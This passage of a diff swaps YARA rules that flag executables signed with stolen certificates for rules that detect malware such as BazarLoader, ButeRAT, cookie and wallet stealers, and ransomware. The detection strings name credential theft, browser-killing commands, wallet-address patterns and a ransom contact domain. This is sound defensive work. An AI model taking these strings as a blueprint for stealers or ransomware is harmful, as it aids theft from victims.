+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5742-L5761"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "95a0bcf9b52ba8f4b63453abf0ee28027689450557a2408c6b27f8aafcbbe945"
+		logic_hash = "c5fa9ecefca1188ba5e81c0518f74023884ad0f66718fc030601cb458bdf2f12"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ca468ff8403a8416042705e79dbc499a5ea9be85"
-		importance = 20
+
+	strings:
+		$s1 = "Sniffer ok!" fullword ascii
+		$s2 = "recv icmp packet!" fullword ascii
+		$s3 = "WSASocket() failed: %d" fullword ascii
+		$s4 = "file on remote computers success" ascii
+		$s5 = "listen port error!" fullword ascii
+		$s6 = "\\PingBackService" ascii
+		$c1 = "exec" fullword ascii
+		$c2 = "rexec" fullword ascii
+		$c3 = "exep" fullword ascii
+		$c4 = "download" fullword ascii
+		$c5 = "upload" fullword ascii
+		$c6 = "shell" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Southern Wall Systems, LLC" and pe.signatures [ i ] . serial == "40:e2:7b:74:04:aa:9b:48:5f:8a:2f:c0:c8:e5:3a:f3" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or all of ( $c* ) or ( 4 of ( $c* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_627Dfdf73A1455De5143A270799E6B7B : FILE
+rule DITEKSHEN_MALWARE_Win_Bazarloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BazarLoader variants"
 		author = "ditekSHen"
-		id = "7d5f0279-9498-5713-9c02-a025268d108f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "6282df59-7244-501f-bb60-09a2a519bd47"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7670-L7681"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5763-L5776"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "833e772e56e87f730ee1acb9d6ed747d239903cfd9470d777efab73c5d656f49"
+		logic_hash = "8febd1355bc03f71794ffb8d51cbb112e8acd2d26fec5bb736a388d5384e7747"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7b69ff55d3c39bd7d67a10f341c1443425f0c83f"
-		importance = 20
+
+	strings:
+		$s1 = "Startdelay for %d ms to avoid some dynamic AV detects!" ascii
+		$s2 = "Use Debug for moving faster!" ascii
+		$s3 = "Logging Mutex %s to %s" ascii
+		$s4 = "FIRST AND ONLY COPY RUNNING! Mutex %s" ascii
+		$s5 = "the most secret 3d GetWinApiPointers line in the world!" ascii
+		$s6 = "[+] makeMD5hash. " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuhai liancheng Technology Co., Ltd." and pe.signatures [ i ] . serial == "62:7d:fd:f7:3a:14:55:de:51:43:a2:70:79:9e:6b:7b" )
+		uint16( 0 ) == 0x5a4d and 3 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1966Bc76Bda1A708334792Da9A336F69 : FILE
+rule DITEKSHEN_MALWARE_Win_Coinminer01 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects coinmining malware"
 		author = "ditekSHen"
-		id = "254ccdb7-df1c-560a-af68-123ea66c3463"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "739e7cea-c6b6-5add-86d4-382b00e2b645"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7683-L7694"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5778-L5790"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d0293e76f8a595d769fd302829bd94a576d647bbacb586728e804bf4dce1af78"
+		logic_hash = "31a7531ecc7b8a35ba882c17d15bd3581e65b4b99dd3a7cb8bca8f6edf204114"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "29fec27c36efc6809c7269f76cf86ee18cc6ed87"
-		importance = 20
+
+	strings:
+		$s1 = "-o pool." ascii wide
+		$s2 = "--cpu-max-threads-hint" ascii wide
+		$s3 = "-P stratum" ascii wide
+		$s4 = "--farm-retries" ascii wide
+		$dl = "github.com/ethereum-mining/ethminer/releases/download" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SYNTHETIC LABS LIMITED" and pe.signatures [ i ] . serial == "19:66:bc:76:bd:a1:a7:08:33:47:92:da:9a:33:6f:69" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( $dl ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_82D224323Efa65060B641F51Fadfef02 : FILE
+rule DITEKSHEN_PUA_Win_Ultrasurf : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects UltraSurf / Ultrareach PUA"
 		author = "ditekSHen"
-		id = "2c0b0e6d-2c82-506b-88ea-a6d49f0f64a6"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ba0f6867-bddc-5e72-978c-8e29b1b6b709"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7696-L7710"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5792-L5807"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ed849dfd905e01145274d41b3bbb2c0265b099e540ac17909b6ed59f006e245"
+		logic_hash = "d8d17b1bf20c12f864697d3dd66f345a8b93e2a75f0489b58b23b7f5264b6be3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8dccf6ad21a58226521e36d7e5dbad133331c181"
-		importance = 20
+
+	strings:
+		$s1 = "Ultrareach Internet Corp." ascii
+		$s2 = "UltrasurfUnionRectUrlFixupWUse Proxy" ascii
+		$s3 = "Ultrasurf UnlockFileUrlEscapeWUser-Agent" ascii wide
+		$s4 = "Ultrasurf0#" ascii
+		$m1 = "main.bindata_read" fullword ascii
+		$m2 = "main.icon64_png" fullword ascii
+		$m3 = "main.setProxy" fullword ascii
+		$m4 = "main.openbrowser" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAVAS INVESTMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" or pe.signatures [ i ] . serial == "00:82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" ) )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or ( all of ( $m* ) and 1 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Be2F22C152Bb218B898C4029056816A9 : FILE
+rule DITEKSHEN_MALWARE_Win_Hello : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Hunt for Hello / WickrMe ransomware"
 		author = "ditekSHen"
-		id = "50c0cee3-39d5-5c57-9515-11356f8cab93"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "99c11aab-8a3a-5e10-9af0-542e55129d51"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7712-L7726"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5809-L5820"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9eba1585d92b184afb7b75b84e0010539ac42ca27e4d5d8bccee6b01e3471cca"
+		logic_hash = "f52f12eb38613f5afd5258b5263c6e6e2d9db6c9659a769f896a2bb66564fa69"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "85fe11e799609306516d82e026d4baef4c1e9ad3"
-		importance = 20
+
+	strings:
+		$s1 = "DeleteBackupFiles" ascii wide
+		$s2 = "GetEncryptFiles" ascii wide
+		$s3 = "DeleteVirtualDisks" ascii wide
+		$s4 = "DismountVirtualDisks" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marts GmbH" and ( pe.signatures [ i ] . serial == "be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" or pe.signatures [ i ] . serial == "00:be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" ) )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_29E8E993D2406454B6B18Cb377471Bc6 : FILE
+rule DITEKSHEN_MALWARE_Win_Buterat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ButeRAT"
 		author = "ditekSHen"
-		id = "a80f015c-3793-52ac-a405-1a7fe2ca0caa"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "74f63d61-6589-5fb1-864a-3a02ddd57ebc"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7728-L7739"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5822-L5839"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bf248e664d00675d3fc87070b6358ca7539ef6e748b8bfafcba7ecb91cb1ea05"
+		logic_hash = "c3d93e8dc1bde8e77c11586c8d8b67d137ef2c4791e12269f1af310fbe14832b"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "0fb38235366b0ba534a6f81c02d9a67555235e07"
-		importance = 20
+
+	strings:
+		$x1 = "TVqQAAMAA" ascii
+		$s1 = "ipinfo.io/geo" wide
+		$s2 = "/index.php" wide
+		$s3 = "Copy-Item -Path" wide
+		$s4 = ";Start-Process" wide
+		$s5 = "Microsoft\\Windows\\Start Menu\\Programs\\Startup" wide
+		$s6 = "LOCALAPPDATA" fullword wide
+		$s7 = "passwords.json" wide
+		$s8 = "Scripting.FileSystemObject" fullword wide
+		$z1 = /(edge|chrome|opera|exodus|jaxx|atomic|coinomi)\.zip/ ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MONDIAL MONTERO SP Z O O" and pe.signatures [ i ] . serial == "29:e8:e9:93:d2:40:64:54:b6:b1:8c:b3:77:47:1b:c6" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) or 1 of ( $z* ) ) and ( 4 of ( $s* ) ) or ( 6 of ( $s* ) ) or ( #z1 > 4 and 2 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6Daa67498C3A5D8133F28Fefe9Ccc20E : FILE
+rule DITEKSHEN_MALWARE_Win_Cookiestealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects generic cookie stealer"
 		author = "ditekSHen"
-		id = "5eb899b3-347d-5e74-8afa-29ffa73c7231"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7741-L7754"
+		id = "64c6c59d-4046-5949-bf71-22a5f6bfa209"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5841-L5857"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dc66a18e4f8d14f98e5a8073d32b641e0eb795e989fb62ac23207e765838561a"
+		logic_hash = "9cc406ae078e37430b3cf10954c02014b9760bc887344842e724df735d1d9808"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f54146fadad277f67b14cfebd13cbada9789281cee7165db0277ad51621adb97"
-		reason = "ParallaxRAT"
-		importance = 20
+
+	strings:
+		$s1 = "([\\S]+?)=([^;|^\\r|^\\n]+)" fullword ascii
+		$s2 = "(.+?): ([^;|^\\r|^\\n]+)" fullword ascii
+		$s3 = "Set-Cookie: ([^\\r|^\\n]+)" fullword ascii
+		$s4 = "cmd.exe /c taskkill /f /im chrome.exe" fullword ascii
+		$s5 = "FIREFOX.EXE|Google Chrome|IEXPLORE.EXE" ascii
+		$pdb1 = "F:\\facebook_svn\\trunk\\database\\Release\\DiskScan.pdb" fullword ascii
+		$pdb2 = "D:\\Projects\\crxinstall\\trunk\\Release\\spoofpref.pdb" fullword ascii
+		$ua1 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" fullword ascii
+		$ua2 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rimsara Development OU" and pe.signatures [ i ] . serial == "6d:aa:67:49:8c:3a:5d:81:33:f2:8f:ef:e9:cc:c2:0e" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 1 of ( $pdb* ) and 1 of ( $ua* ) ) or ( all of ( $ua* ) and 1 of ( $pdb* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_59F296D0Af649E0962D724248D9Fdcdb : FILE
+rule DITEKSHEN_MALWARE_Win_Bitcoingrabber : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects generic bitcoin stealer"
 		author = "ditekSHen"
-		id = "c9423cae-07a7-5ecb-966d-b1636563934a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7756-L7769"
+		id = "f73b58da-1db5-5767-ae0a-074648e30966"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5859-L5875"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0212033b2ea12f568a3c2e4d3768194c8035c6b6ebf054af90fe82ffcd7e6a5b"
+		logic_hash = "2dc762525c1fbf25517df52f0561d96d7469bf1367eada31c236fc313001c6cb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ce2aa31a714cc05f86d726a959f6655efc40777aa474fb6b9689154fdc918a44"
-		reason = "DarkGate"
-		importance = 20
+
+	strings:
+		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$s2 = "Bitcoin-Grabber" ascii
+		$s3 = "Bitcoin_Grabber" ascii
+		$s4 = "encrypt resources [compress]T" fullword ascii
+		$s5 = "code control flow obfuscationT" fullword ascii
+		$s6 = "\\Users\\lakol\\Desktop\\a\\Crypto Currency Wallet Changer\\" ascii
+		$pat1 = "\\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,35}\\b" fullword wide
+		$pat2 = "\\b0x[a-fA-F0-9]{40}\\b" fullword wide
+		$pat3 = "\\b4([0-9]|[A-B])(.){93}\\b" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MK ZN s.r.o." and pe.signatures [ i ] . serial == "59:f2:96:d0:af:64:9e:09:62:d7:24:24:8d:9f:dc:db" )
+		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( all of ( $pat* ) and 2 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_A32F3Ba229704Ad400473F7479E4C3E4 : FILE
+rule DITEKSHEN_MALWARE_Win_FOXGRABBER : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects FOXGRABBER utility"
 		author = "ditekSHen"
-		id = "28d687bc-e67c-51d1-82af-53255ee44a8d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7771-L7784"
+		id = "b98e501c-e9c6-5fcc-bfa0-9475ce32864c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5877-L5890"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9c7b9b6827e10a8c2a6d771d14068a074104683fe75f24dea85c5bf3f3bc04db"
+		logic_hash = "5ecba516f1155bdcccf83b0a034b11d8eac8619d4c3326fdbc76082fbe4daf02"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ab4b30913895d8df383fdadebc29d2e04a5c854bc4172c0d41bcbef176e8f37e"
-		reason = "RecordBreaker"
-		importance = 20
+
+	strings:
+		$s1 = "start grabbing" wide
+		$s2 = "end grabbing in" wide
+		$s3 = "error of copying files from comp:" wide
+		$s4 = "\\Firefox\\" wide nocase
+		$pdb1 = "\\obj\\Debug\\grabff.pdb" ascii
+		$pdb2 = "\\obj\\Release\\grabff.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SOTUL SOLUTIONS LIMITED" and pe.signatures [ i ] . serial == "a3:2f:3b:a2:29:70:4a:d4:00:47:3f:74:79:e4:c3:e4" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $pdb* ) and 1 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3Ab74A2Ebf93447Adb83554B5564Fe03 : FILE
+rule DITEKSHEN_MALWARE_Win_Browsergrabber : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Hunt for FOXGRABBER-like samples but for various browsers"
 		author = "ditekSHen"
-		id = "1b0be137-ddcf-5215-9cb0-d687d7b6ca6c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7786-L7799"
+		id = "a50a60cf-5ab8-5e4e-be00-aa0306f4d84f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5892-L5906"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8dbc549ecaf1cb3f07486bac7ed265882af4b6b29b9772736118490eb9233303"
+		logic_hash = "c96a63566280758d8c32542bfab3c6faa7d21329430345f51ea4c2f0a6809dc2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8ed289fcc40bbc150a52b733123f6094ccfb2c499d6e932b0d9a6001490fb7e6"
-		reason = "RedLineStealer"
-		importance = 20
+
+	strings:
+		$s1 = "start grabbing" wide
+		$s2 = "end grabbing in" wide
+		$s3 = "error of copying files from comp:" wide
+		$s4 = /(Chrome|Edge)/ wide
+		$ff = "\\Firefox\\" wide nocase
+		$pdb1 = "\\obj\\Debug\\grab" ascii
+		$pdb2 = "\\obj\\Release\\grab" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IMPERIOUS TECHNOLOGIES LIMITED" and pe.signatures [ i ] . serial == "3a:b7:4a:2e:bf:93:44:7a:db:83:55:4b:55:64:fe:03" )
+		uint16( 0 ) == 0x5a4d and not ( $ff ) and ( all of ( $s* ) or ( 1 of ( $pdb* ) and 1 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_90212473C706F523Fe84Bdb9A78A01F4 : FILE
+rule DITEKSHEN_MALWARE_Win_Deathransom : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects known DeathRansom ransomware"
 		author = "ditekSHen"
-		id = "f195cf1e-4e01-51ec-ae12-21ff56dd58e2"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7801-L7814"
+		id = "a6eeb607-8b5c-5982-8b5a-aa2b3c6a65e6"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5908-L5925"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8cd1e984bb81f071053614ae9d037d7ff5e01fb95aaa0474492386a7b5faecec"
+		logic_hash = "3c87364a7ecc403262056eeccaa16bf230fbbe684e21d35099d0d572abba9eda"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6b18e9451c2e93564ed255e754b7e1cf0f817abda93015b21ae5e247c75f9d03"
-		reason = "Cerber"
-		importance = 20
+
+	strings:
+		$s1 = "%s %f %c" fullword ascii
+		$pdb1 = ":\\wud.pdb" ascii
+		$spdb2 = "\\crypt_server\\runtime\\crypt" ascii
+		$spdb3 = "\\bin\\nuvin.pdb" ascii
+		$h1 = "#Dunubeyokunov" wide
+		$h2 = "^Neyot dehipijakeyelih" wide
+		$h3 = "talin%Sanovurenofibiw" wide
+		$h4 = "WriteFile" fullword ascii
+		$h5 = "ClearEventLogA" fullword ascii
+		$h6 = "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DEMUS, OOO" and pe.signatures [ i ] . serial == "90:21:24:73:c7:06:f5:23:fe:84:bd:b9:a7:8a:01:f4" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $pdb* ) or ( all of ( $s* ) and 1 of ( $pdb* ) ) or 5 of ( $h* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5C9F5F96726A6E6Fc3B8Bb153Ac82Af2 : FILE
+rule DITEKSHEN_MALWARE_Win_Unlockyourfiles : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects UnlockYourFiles ransomware"
 		author = "ditekSHen"
-		id = "f79e1a89-c7b4-5390-b20b-3f563f409cfe"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7816-L7829"
+		id = "265f2a48-143a-56c9-9cd4-b5137799a9e8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5927-L5946"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "da76d86509aee2f9cac992e6b081dce5e68c747ad34abd2daeb32e6e390b880b"
+		logic_hash = "05f549467fac03d4aa2248a9c6c87e4c4273ed6ad727ebb77a4dd115032e454b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "285925b7c7c692f8d71d980dcf2ddb4c208a0f7b826ead34db402755d1a0f6de"
-		reason = "IcedID"
-		importance = 20
+
+	strings:
+		$s1 = "filesx0" wide
+		$s2 = "_auto_file" wide
+		$s3 = "<EncyptedKey>" fullword wide
+		$s4 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\" wide
+		$s5 = "DecryptAllFile" fullword ascii
+		$s6 = "AES_Only_Decrypt_File" fullword ascii
+		$m1 = "Free files decrypted" wide
+		$m2 = "Restore my files" wide
+		$m3 = "Type tour password..." wide
+		$m4 = "files encrypted by strong password" ascii
+		$m5 = "buy bitcoin" ascii
+		$m6 = "Unlock File" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "1105 SOFTWARE LLC" and pe.signatures [ i ] . serial == "5c:9f:5f:96:72:6a:6e:6f:c3:b8:bb:15:3a:c8:2a:f2" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or 5 of ( $m* ) or ( 2 of ( $s* ) and 2 of ( $m* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2A2F270535C2D5E7630720Fb229B5D1C : FILE
+rule DITEKSHEN_MALWARE_Win_Decryptmyfiles : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DecryptMyFiles ransomware"
 		author = "ditekSHen"
-		id = "3ed98546-92b2-5566-9716-ae8209ece9d6"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7831-L7844"
+		id = "dab518f2-3fac-5492-88fb-35cd0000ec47"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5948-L5964"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7d9785c12d2d744fbafab009edfb1ef232eadcdbc8eee99d0ad0daacabbabf26"
+		logic_hash = "5b7f74569700e2ad3f31388571dad5ffda45f5ab3dd36806f7514aff0367d5ba"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "73a0cc4495a49492806b970fd844a0ab078126930305d22c7bf68b43c337fc1a"
-		reason = "IcedID"
-		importance = 20
+
+	strings:
+		$s1 = "FILES ENCRYPTED" wide
+		$s2 = "pexplorer.exe" fullword wide
+		$s3 = "uniquesession" fullword ascii
+		$s4 = ".[decryptmyfiles.top]." fullword ascii
+		$s5 = "decrypt 1 file" ascii
+		$s6 = "(databases,backups, large excel" ascii
+		$c1 = "api/connect.php" ascii
+		$c2 = "decryptmyfiles.top" ascii
+		$c3 = "/contact/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOZUZ SP. Z O.O." and pe.signatures [ i ] . serial == "2a:2f:27:05:35:c2:d5:e7:63:07:20:fb:22:9b:5d:1c" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or all of ( $c* ) or ( 2 of ( $c* ) and 2 of ( $s* ) ) )
 }
-
